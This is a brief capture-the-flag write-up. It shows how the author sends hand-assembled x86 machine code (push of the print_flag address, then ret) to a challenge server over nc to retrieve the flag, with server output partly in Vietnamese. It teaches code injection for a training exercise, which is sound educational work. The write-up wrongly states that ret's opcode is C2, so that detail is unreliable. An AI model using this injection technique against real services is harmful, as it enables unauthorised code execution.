Junior Hacking Talent - Mã Máy Writeup

❯ nc 188.166.233.168 4790
 -------------------------------------------------
|   080487b4 <print_flag>:                        |
|   080487b4:   55                push   ebp      |
|   080487b5:   89 e5             mov    ebp,esp  |
|   080487b7:   53                push   ebx      |
|   ....                                          |
 -------------------------------------------------

Looking at the Assembly, we notice that print_flag() resides at the address 0x080487b4, this is what we need to execute.

There are multiple ways to jump to that function but what I’ll be using is push+ret.

push        0x080487b4
ret

Essentially, the push instruction will put 0x080487b4 at the top of the stack, which will later be popped off by ret and placed into EIP.

With the help of the handy x86 Instruction Set Reference, we can easily figure out the opcodes for push and ret which is 68 and C2 correspondingly.

Before blindly pushing this address into memory, we need to consider something called endianess. As we’re executing this on the 80386, which uses the little-endian format, we would have to convert 0x080487b4 from big-endian to little-endian which is 0xb4870408.

All that’s left is to combine everything and send it to the CTF server:

❯ echo "68B4870408C2" | nc 188.166.233.168 4790
 -------------------------------------------------
|   080487b4 <print_flag>:                        |
|   080487b4:	55             push   ebp      |
|   080487b5:	89 e5          mov    ebp,esp  |
|   080487b7:	53             push   ebx      |
|   ....                                          |
 -------------------------------------------------

Hãy nhập đoạn mã máy mà em muốn:

Disassembly:

68 b4 87 04 08             push  0x80487b4

Chúc mừng em đã viết mã máy thực thi hàm print_flag() thành công!
Đây là phần thưởng dành cho em CTF{computers_only_understand_machine_code}